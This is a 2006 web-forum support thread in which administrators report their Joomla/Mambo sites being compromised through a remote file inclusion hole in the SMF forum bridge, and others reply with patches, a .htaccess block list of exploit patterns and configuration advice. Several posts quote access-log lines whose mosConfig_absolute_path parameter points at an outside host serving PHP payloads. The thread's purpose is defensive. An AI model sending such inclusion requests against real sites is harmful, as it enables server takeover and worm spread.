hey i got hacked by the brigde when i try to get to forum i can't and there is a message that i got hacked please help me
the bridge is Bridge Mambo, Joomla SMF 1.1.2
the mambo is mambov4.5.3h
the smf is SMF 1.1 RC2
what i have to do ?
Post a URL please.
Read this thread to find the fixes :
http://www.simplemachines.org/community/index.php?topic=100035.0;all
http://www.simplemachines.org/community/index.php?topic=100140.0
hi!
there is a smf-bridge exploit running threw web.
in my access-log there are many logs like
/component/option,com_smf/Itemid,28/components/com_smf/smf.php?mosConfig_absolute_path=http://URLEDITFORSECURITYREASONS/list.txt
or e.g.
/component/option,com_smf/components/com_smf/smf.php?mosConfig_absolute_path=http://URLEDITFORSECURITYREASONS/e4.php
is there a security hole in bridge and if so, which versions are affected?
mfg
Markus :(
this has been discussed. Don't you read the sticky posts?
all versions prior to 1.1.5a will require a single line addition to the smf.php file.
Lainaus käyttäjältä: Kindred - heinäkuu 18, 2006, 02:44:07 IP
this has been discussed. Don't you read the sticky posts?
all versions prior to 1.1.5a will require a single line addition to the smf.php file.
sorry, i did not know, that the topic "security update" has to do with this "problem".
it could had been that there is also another security hole...
in joomla-forum i found a helpfull solution for most/common joomla-exploits
code from here: http://forum.joomla.org/index.php/topic,75376.0.html
insert into .htaccess-file of joomla-root-directory:
########## Begin - Rewrite rules to block out some common exploits
#
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script that tries to set CONFIG_EXT (com_extcal2 issue)
RewriteCond %{QUERY_STRING} CONFIG_EXT(\[|\%20|\%5B).*= [NC,OR]
# Block out any script that tries to set sbp or sb_authorname via URL (simpleboard)
RewriteCond %{QUERY_STRING} sbp(=|\%20|\%3D) [OR]
RewriteCond %{QUERY_STRING} sb_authorname(=|\%20|\%3D)
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploitsthats not a fix or guarantee that a site is not affected with security-holes of other 3pd-joomla-components,
but it makes 3pd-joomla-components a little bit more secure.
Markus
Hello all!
Today I noticed unusual high traffic on my site, so I checked my apache log file and found numerous records of these type:
81.169.128.x - - [18/Jul/2006:16:41:39 -0500] "GET /component/option,com_smf/Itemid,36/components/com_smf/smf.php?mosConfig_absolute_path=http://www.podgorz.cc/e3.php?? HTTP/1.0" 200 35729 "-" "Mozilla/5.0"
81.169.128.x - - [18/Jul/2006:16:42:05 -0500] "GET /component/option,com_smf/Itemid,36/components/com_smf/smf.php?mosConfig_absolute_path=http://www.podgorz.cc/e4.php?? HTTP/1.0" 200 35659 "-" "Mozilla/5.0"
81.169.128.x - - [18/Jul/2006:16:42:06 -0500] "GET /component/option,com_smf/Itemid,36/components/com_smf/smf.php?mosConfig_absolute_path=http://www.podgorz.cc/e4.php?? HTTP/1.0" 200 35717 "-" "Mozilla/5.0"
These attacks came from various IPs, with the word mosConfig_absolute_path=http://www.podgorz.cc/e*.php?? in the URL. All of e*.php are trying to get a file http://www.podgorz.cc/elo.txt, and then compile it, although I have no idea what is the code for. I did a quick google, and realized that this is a worm called Perl.Raumoni, but still not sure exactly what the hazard is.
Any of you had this experience? What do I do to correct or prevent any damage?
Thanks,
duckpond
argh they beat me to my site, but I did make a backup in time
watch this: http://www.simplemachines.org/community/index.php?topic=100140.0
and this: http://www.simplemachines.org/community/index.php?topic=99747.0
andt this: http://www.simplemachines.org/community/index.php?topic=100260.msg649272#msg649272
Something you can add to your .htaccess if you're running PHP as an Apache module is this:
php_flag allow_url_fopen Off
This will not work if you are running PHP as CGI!
What this does is prevents includes and requires from being URLs. There will be a PHP error if that is attempted.
If you are running PHP as CGI, you can contact your host and ask them to turn off allow_url_fopen.
Hi All,
My forum has been hacked today, and it looks like the following requests were sent for the hack attempt:
/component/option,com_smf/Itemid,177/components/com_smf/smf.php?mosConfig_absolute_path=http://www.podgorz.cc/e3.php??
/component/option,com_smf/Itemid,177/components/com_smf/smf.php?mosConfig_absolute_path=http://www.podgorz.cc/e4.php??
/component/option,com_smf/Itemid,177/components/com_smf/smf.php?mosConfig_absolute_path=http://www.podgorz.cc/e5.php??
It looks like I had register_globals on for some reason (I always thought this was off, which was stupid off me)...
Just wanted to inform others so that they would not make the same mistake...
Stickied to the top of this board:
http://www.simplemachines.org/community/index.php?topic=100140.0
back up, sans bridge, now that I have access to smf again, I can get started with the upgrade and then the install of bridge *.15, my test site and the site I run for my friend were already running that version because they were running RC2, my site was running 1.0.7 for both joomla and smf, but now I know not to wait on 1.1 b/c Orstio isn't the only one who abandoned 1.0.x
Lainaamy test site and the site I run for my friend were already running that version because they were running RC2
Make sure to upgrade to 1.1.5a.
Is there a mailing-list? This would make sense to announce security-updates of the bridge an new versions to the subscribers. I often check the forum but there are many people which install it and never visit the forums again (unless they have a problem, and that's maybe to late). Or a text in the adminpane of joomla which checks for the latest version an goes red if you have an old version....
when was 1.1.5a released? my panels just say 1.1.5 for the current installed version
edit:
found the edit in the post for 1.1.5, applied changed sef.php
LainaaIs there a mailing-list? This would make sense to announce security-updates of the bridge an new versions to the subscribers. I often check the forum but there are many people which install it and never visit the forums again (unless they have a problem, and that's maybe to late). Or a text in the adminpane of joomla which checks for the latest version an goes red if you have an old version....
No, there isn't unfortunately. There is talk of it, but nothing yet.
I can host it if necessary, just putting that out there. (Probably better if a bigger site with more bandwidth picks it up though)
Or we could set up a newsgroup or something. Lets figure something out in the short-term then we can transition to something bigger.